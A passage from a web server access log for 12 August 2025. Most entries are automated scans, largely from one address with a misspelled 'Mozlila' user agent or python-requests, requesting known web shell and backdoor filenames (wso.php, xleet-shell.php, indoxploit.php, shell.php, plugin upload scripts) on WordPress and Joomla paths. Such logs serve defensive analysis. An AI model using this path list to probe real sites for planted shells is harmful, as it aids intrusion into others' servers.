Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:20:58:26 -0400] "GET /xl2023x.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:59:50 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:20:59:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:20:59:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:59:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:20:59:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:00:27 -0400] "GET /xxl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:01:55 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 4.43.184.114 - - [12/Aug/2025:21:03:05 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/9.0.1" 94.16.113.252 - - [12/Aug/2025:21:03:40 -0400] "GET /xl.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:21:05:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:21:05:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:21:05:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:21:05:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:05:38 -0400] "GET /wp-admin/xl2023.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:06:53 -0400] "GET /defaults.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 146.190.11.185 - - [12/Aug/2025:21:07:19 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:07:19 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:21:07:19 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:21:07:20 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:07:39 -0400] "GET /wp-includes/xl2023.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:08:14 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:09:38 -0400] "GET /.well-known/acme-challenge/iR7SzrsOUEP.php HTTP/1.1" 301 277 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.169.39.47 - - [12/Aug/2025:21:11:46 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:11:59 -0400] "GET /wp-admin/includes/iR7SzrsOUEP.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:12:19 -0400] "GET /wp-admin/maint/iR7SzrsOUEP.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:14:15 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:14:20 -0400] "GET /wp-content/upgrade/iR7SzrsOUEP.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:21:14:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:14:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:21:14:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:21:14:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:16:29 -0400] "GET /images/iR7SzrsOUEP.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:18:04 -0400] "GET /wp-admin/user/iR7SzrsOUEP.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:18:46 -0400] "GET /wp-admin/js/widgets/iR7SzrsOUEP.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:19:01 -0400] "GET /wp-admin/network/iR7SzrsOUEP.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:21:19:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:21:19:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:21:19:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:21:19:11 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.113 - - [12/Aug/2025:21:20:03 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 4.43.184.113 - - [12/Aug/2025:21:20:06 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:21:54 -0400] "GET /wp-admin/images/iR7SzrsOUEP.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:22:06 -0400] "GET /.well-known/pki-validation/iR7SzrsOUEP.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:22:18 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:23:29 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:23:47 -0400] "GET /admin-heade.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:24:39 -0400] "GET /wp-includes/random_compat/about.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:24:46 -0400] "GET /cgi-bin/iR7SzrsOUEP.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:25:12 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:25:55 -0400] "GET /wp-content/xl2023.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:21:25:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:21:25:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:21:25:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:21:25:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:26:21 -0400] "GET /wp-includes/css/modules.php HTTP/1.1" 301 262 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:26:37 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:26:42 -0400] "GET /wp-content/xl2023.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:26:53 -0400] "GET /wp-content/plugins/upspy/index.php HTTP/1.1" 301 269 "-" "python-requests/2.27.1" 69.171.249.6 - - [12/Aug/2025:21:27:01 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:21:27:08 -0400] "GET /wp-content/plugins/ubh/index.php HTTP/1.1" 301 267 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:27:24 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php?cache HTTP/1.1" 301 284 "-" "python-requests/2.27.1" 209.38.125.40 - - [12/Aug/2025:21:27:36 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:21:27:36 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:21:27:36 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:21:27:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:21:27:47 -0400] "GET /iR7SzrsOUEP.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:28:00 -0400] "GET /wp-content/plugins/xichang/x.php?xi HTTP/1.1" 301 270 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:28:25 -0400] "GET /wp-content/uploads/xl2023.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:28:30 -0400] "GET /wp-content/plugins/html404/index.html HTTP/1.1" 301 272 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:29:04 -0400] "GET /wp-admin/shapes.php HTTP/1.1" 301 254 "-" "python-requests/2.27.1" 68.183.245.101 - - [12/Aug/2025:21:29:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:29:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:21:29:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:21:29:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:29:26 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:29:27 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:29:51 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:30:12 -0400] "GET / HTTP/1.1" 301 235 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:30:45 -0400] "GET /up.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:31:03 -0400] "GET /upload.php HTTP/1.1" 301 245 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:31:20 -0400] "GET /wp-content/uploads/ HTTP/1.1" 301 254 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:31:38 -0400] "GET /wp-content/uploads/2025/08/ HTTP/1.1" 301 262 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:32:01 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:32:27 -0400] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 301 265 "-" "python-requests/2.27.1" 35.247.26.164 - - [12/Aug/2025:21:32:46 -0400] "HEAD /wordpress HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:32:47 -0400] "GET /wp-info.php HTTP/1.1" 301 246 "-" "python-requests/2.27.1" 35.247.26.164 - - [12/Aug/2025:21:32:48 -0400] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:48 -0400] "HEAD /wp HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:48 -0400] "HEAD /bc HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:49 -0400] "HEAD /bk HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:49 -0400] "HEAD /backup HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:50 -0400] "HEAD /old HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:50 -0400] "HEAD /new HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:51 -0400] "HEAD /main HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 35.247.26.164 - - [12/Aug/2025:21:32:52 -0400] "HEAD /home HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:33:05 -0400] "GET /wp-content/vuln.php HTTP/1.1" 301 254 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:33:20 -0400] "GET /upel.php HTTP/1.1" 301 243 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:33:27 -0400] "GET /class.api.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:33:33 -0400] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 301 265 "-" "python-requests/2.27.1" 209.38.125.40 - - [12/Aug/2025:21:33:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:21:33:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:33:48 -0400] "GET /098.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 156.146.41.214 - - [12/Aug/2025:21:33:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:21:33:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:34:05 -0400] "GET /V5.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:34:24 -0400] "GET /new_license.php HTTP/1.1" 301 250 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:34:42 -0400] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 301 281 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:35:06 -0400] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 301 275 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:35:32 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:35:45 -0400] "GET /updates.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:35:50 -0400] "GET /modules/modules/modules.php HTTP/1.1" 301 262 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:36:09 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/Clean.php HTTP/1.1" 301 286 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:36:33 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 301 284 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:37:05 -0400] "GET /libraries/joomla/css.php HTTP/1.1" 301 259 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:21:37:29 -0400] "GET 